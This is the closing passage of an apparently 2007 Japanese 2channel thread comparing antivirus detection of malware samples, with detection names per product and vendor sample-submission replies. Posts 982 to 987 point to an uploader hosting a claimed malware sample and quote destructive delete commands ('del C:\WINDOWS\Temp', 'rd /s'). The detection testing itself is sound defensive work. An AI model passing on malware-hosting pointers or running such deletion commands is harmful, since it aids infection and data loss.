/3/mminstall.exe Trojan.Farfli として検出
その他は反応無しなので贈っておきます
969:名無しさん@お腹いっぱい。
07/09/26 12:56:51
>>960
McAfee完全スルー
970:名無しさん@お腹いっぱい。
07/09/26 14:58:59
>>960
ウイルスバスター2007
51-70.pif
TSPY_WOWSTEAL.CN
ysydown.cab
TROJ_SMALL.IMH
vip.exe
TROJ_DELF.IVK
gmsex.exe
Possible_Infostl
残り検体提出します
971:名無しさん@お腹いっぱい。
07/09/26 16:09:21
>>960
んー、某資料室の人?
>>963
なんかハクられてね?
972:名無しさん@お腹いっぱい。
07/09/26 17:18:25
>>971
いんや、どこの人でもないよ
973:名無しさん@お腹いっぱい。
07/09/26 18:02:37
>>972
そか。McAfee使いで中華アカハックトロイばっかだったんで勘違いした。
974:名無しさん@お腹いっぱい。
07/09/26 20:37:34
>>960
ウイルスキラー
2\121.exe
Trojan.DL.Win32.Agent.zdy
7\vip.exe>>upack0.36
Trojan.Clicker.Win32.PopHot.bq
8\gmsex.exe
Trojan.PSW.Win32.QMOnline.a
975:名無しさん@お腹いっぱい。
07/09/26 20:55:42
次スレどこー??
976:965
07/09/26 21:08:56
>>960
カスペ2次報告
9(ほかに2は返事待ち)/11
: Trojan program Trojan-PSW.Win32.OnLineGames.dij File: 0/51-70.pif
: malware not-virus:Hoax.Win32.Avola.a File: 1/setup.exe
: Trojan program Trojan-Downloader.Win32.Hmir.ae File: 2/121.exe(検体提出による追加検出)
: Trojan program Trojan-Downloader.Win32.Agent.dlv File: 3/mminstall.exe
: malware Exploit.JS.Agent.am File: 4/bf.htm(検体提出による追加検出)
: Trojan program Trojan-Downloader.Win32.Delf.cfu File: 5/ysydown.cab/ysydown.exe (シグネチャに変更)
: virus Virus.Win32.AutoRun.pd File: 6/player.exe (シグネチャに変更)
: Trojan program Trojan-Spy.Win32.Agent.abv File: 7/vip.ex
: Trojan program Trojan-PSW.Win32.OnLineGames.dor File: 8/gmsex.exe
: Trojan program Trojan-Downloader.JS.Agent.oq File: 9/1.js
a/tools.js→返事待ち
b/spb40.exe→返事待ち
977:名無しさん@お腹いっぱい。
07/09/26 21:13:34
>>975
ここは、どうよ。
糞スレリサイクル。250レスほど余っている。
【NOD厨】検出力調査スレ2【出禁】
スレリンク(sec板)
それとも、新スレ立てた方がいいか?
978:名無しさん@お腹いっぱい。
07/09/26 21:24:33
>>977
そこは機能していない。放置でいいと思う。
こっちを再利用するのはいいと思う。
【信者】検出力調査スレ3【禁止】
スレリンク(sec板)
979:名無しさん@お腹いっぱい。
07/09/26 21:25:58
キング
0\51-70.pif Win32.Troj.Downloader.ph.110592
一匹
送っておいたお
980:名無しさん@お腹いっぱい。
07/09/26 22:19:04
>>978
そっちの方がいいかも。
981:名無しさん@お腹いっぱい。
07/09/26 22:37:24
>>954
(m´・ω・`)m ゴメン…
おいらが、先に送っちゃった
982:名無しさん@お腹いっぱい。
07/09/26 22:38:58
423 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/09/26(水) 22:06:25
****W32.DarkManko.F****
Winnyなどに出回っている
"めっちゃ臭いやん.avi exe"
というファイルを実行してしまうと感染。
画面上にDarkMankoが張り付きます
427 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2007/09/26(水) 22:23:25
W32.DarkManko.Fの検体入手しますた
URLリンク(up-sv.ath.cx)
983:名無しさん@お腹いっぱい。
07/09/26 22:41:21
>>978
こっちで良いと思う。多分>>977は荒らしで埋まる。
984:名無しさん@お腹いっぱい。
07/09/26 22:42:49
>>982
中身はバッチファイルで、
del C:\WINDOWS\Temp
しか書いてない。
985:名無しさん@お腹いっぱい。
07/09/26 22:44:59
del C:\WINDOWS\Temp
え?
986:名無しさん@お腹いっぱい。
07/09/26 22:46:32
Windowsぶっ壊れるぞ・・・
987:名無しさん@お腹いっぱい。
07/09/27 00:06:11
rd /s のほうがry
988:名無しさん@お腹いっぱい。
07/09/27 03:01:10
そもそも、DarkManko なんて名前付けないだろ……
989:名無しさん@お腹いっぱい。
07/09/27 03:15:04
ume
990:名無しさん@お腹いっぱい。
07/09/27 07:57:37
>>986
tempだからいいだろ消えても。
991:名無しさん@お腹いっぱい。
07/09/27 19:09:50
ume
992:名無しさん@お腹いっぱい。
07/09/27 19:11:13
grrrrrrrrrrr
993:965
07/09/27 20:12:05
>>960
>>976の追加報告
a/tool.js, b/spb.40.exeは「白」との返事
Hello,
tool.js_
No malicious code was found in this file.
Please quote all when answering.
Hello,
spb40.exe_
No malicious code was found in this file.
Please quote all when answering.
--
Best regards, Namestnikov Yury
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
URLリンク(www.kaspersky.com)
994:名無しさん@お腹いっぱい。
07/09/27 21:36:39
うめ
995:名無しさん@お腹いっぱい。
07/09/27 21:41:59
∧_ ∧ なにこのスレ
_ ( ´・ω・`) __
/ ( ( つ┳つノ \
/  ̄ ̄ ̄ ̄ ヽ
| / \ |
| ● ● |
| | ころころ~
ヽ (_人_) ノ
~~~~ ◎――――◎
996:名無しさん@お腹いっぱい。
07/09/27 21:42:57
γ''"""ヽ、
/ / ゚ ▼) W(`0`)W ガオォー
し' (,,゚Д゚)
ノ|(ノ |)
∠,,人,,_,,ノ
U"U
_, ,_ ?
997:名無しさん@お腹いっぱい。
07/09/27 22:50:59
可愛らしいけどume
998:名無しさん@お腹いっぱい。
07/09/27 22:53:06
,、‐ " ̄:::゙:丶、 ∩_
,r::::l3゙::::::::/ハヽ:ヽ::::、:ヽ〈〈〈 ヽ
{::://:::::::// ヽ\ト、::::::〈⊃ }
ヾ l:::::::/ \ `/ヾ ィ、:::| |
|;:r::| ●` ●ヾハ| |
ヽハ::::: :::レ / !
´\ ・ ,ノヽ / <これ
/ヾ ̄下~ |_/
/ヽ_ _\ .ィ ヽ/
/ n_n |
>、 /_ l゚ω゚| |
(___)  ̄ |
999:名無しさん@お腹いっぱい。
07/09/27 22:54:28
ウッキィー
1000:名無しさん@お腹いっぱい。
07/09/27 22:56:29
1000
1001:1001
Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。